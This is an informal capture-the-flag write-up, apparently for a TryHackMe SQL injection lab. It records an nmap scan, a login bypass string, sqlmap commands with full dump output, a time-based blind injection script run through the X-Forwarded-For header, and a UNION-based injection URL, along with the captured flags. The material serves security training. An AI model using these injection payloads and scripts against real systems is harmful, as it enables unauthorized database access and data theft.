Main IP :: 10.48.161.169

DUE TO CONCEPTS BEING NOT SO CLEAR FROM MY SIDE OF SQLMAP WE ARE GOING TO USE SQLMAP.

So for this we start with nmap scan.
Nmap scan report for 10.48.161.169
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e3:f7:cc:69:b8:ec:86:6e:1e:da:84:87:00:2d:2d:ac (RSA)
|   256 24:40:b4:5a:03:cb:06:7e:54:b3:39:24:45:44:c0:5b (ECDSA)
|_  256 ab:e7:3b:b8:66:3a:c6:50:dc:92:b4:a0:22:c8:68:78 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


so we will find the first flag from login for by

' OR 1=1 --+ a
123
THM{FLAG1:E786483E5A53075750F1FA792E823BD2}

now heading towards different flags.

now with post?id=2 we run sqlmap here THM{FLAG5:B9C690D3B914F7038BA1FC65B3FDF3C8} andhave this.


 sqlmap -u  http://10.48.161.169/post?id=1 --dbs --dump                
        ___
       __H__                                                                         
 ___ ___[(]_____ ___ ___  {1.10.4#stable}                                            
|_ -| . ["]     | .'| . |                                                            
|___|_  [)]_|_|_|__,|  _|                                                            
      |_|V...       |_|   https://sqlmap.org                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:47:35 /2026-05-04/

[15:47:35] [INFO] testing connection to the target URL
[15:47:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:47:36] [INFO] testing if the target URL content is stable
[15:47:36] [INFO] target URL content is stable
[15:47:36] [INFO] testing if GET parameter 'id' is dynamic
[15:47:36] [INFO] GET parameter 'id' appears to be dynamic
[15:47:37] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[15:47:37] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[15:47:37] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[15:47:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:47:49] [WARNING] reflective value(s) fo


fROM readingjavascript of the page of /register weget it is checking if user name is there and it will give us.

so we  sqlmap -u  http://10.48.161.169/register/user-check?username=admin --dbs --dump
thi  and check and username parammeter is vulnerable.


d
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 9789 FROM (SELECT(SLEEP(5)))LNKt) AND 'aahR'='aahR
---
[15:52:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12
[15:52:37] [INFO] fetching database names
[15:52:37] [INFO] fetching number of databases
[15:52:37] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:52:37] [INFO] retrieved: 2
[15:52:38] [INFO] retrieved: information_schema
[15:52:47] [INFO] retrieved: sqhell_3
available databases [2]:
[*] information_schema
[*] sqhell_3

[15:52:51] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:52:51] [INFO] fetching current database
[15:52:51] [INFO] retrieved: sqhell_3
[15:52:55] [INFO] fetching tables for database: 'sqhell_3'
[15:52:55] [INFO] fetching number of tables for database 'sqhell_3'
[15:52:55] [INFO] retrieved: 2
[15:52:56] [INFO] retrieved: flag
[15:52:58] [INFO] retrieved: users
[15:53:01] [INFO] fetching columns for table 'flag' in database 'sqhell_3'
[15:53:01] [INFO] retrieved: 2
[15:53:02] [INFO] retrieved: flag
[15:53:04] [INFO] retrieved: id
[15:53:05] [INFO] fetching entries for table 'flag' in database 'sqhell_3'
[15:53:05] [INFO] fetching number of entries for table 'flag' in database 'sqhell_3'
[15:53:05] [INFO] retrieved: 1
[15:53:06] [INFO] retrieved: THM{FLAG3:97AEB3B28A4864416718F3A5FAF8F308}
[15:53:30] [INFO] retrieved: 1
Database: sqhell_3
Table: flag
[1 entry]
+----+---------------------------------------------+
| id | flag                                        |
+----+---------------------------------------------+
| 1  | THM{FLAG3:97AEB3B28A4864416718F3A5FAF8F308} |



Now moving ahead we will look for.

import requests
import time
import string

server = "sqhell.thm" # IP OR SERVERNAME IF IN HOST FILE
flag = ""
loop = 1

while chr(125) not in flag:
    for a in range(48,126):
        start = time.time()
        r = requests.get(url="http://" + server, headers={'X-Forwarded-For':f"1' AND (SELECT sleep(2) FROM flag where (ASCII(SUBSTR(flag,{loop},1))) = '{a}'); --+"})
        end = time.time()
        if end-start >= 2:
            flag += chr(a)
            loop += 1
            print("Finding Flag: ", flag, end="\r")
            break
print("Flag found: ", flag)



we have this as hintso let's see if this works or not.
or we can go with sqlmap  -u http://sqhell.thm --headers="X-forwarded-for:1*" --dbms mysql
we have this THM{FLAG2:C678ABFE1C01FCA19E03901CEDAB1D15}5}


and for last  flag again sqlmap 

sqlmap -u "http://sqhell.thm/user?id=1" -p "id" --dbs --dbms=mysql --threads 10


and with this
http://sqhell.thm/user?id=1337%20union%20select%20%221%20union%20select%201,flag,3,4%20from%20flag--%20-%22,2,3%20from%20information_schema.tables%20where%20table_schema=database()

we have the last flag.THM{FLAG4:BDF317B14EEF80A3F90729BF2B426BEF}
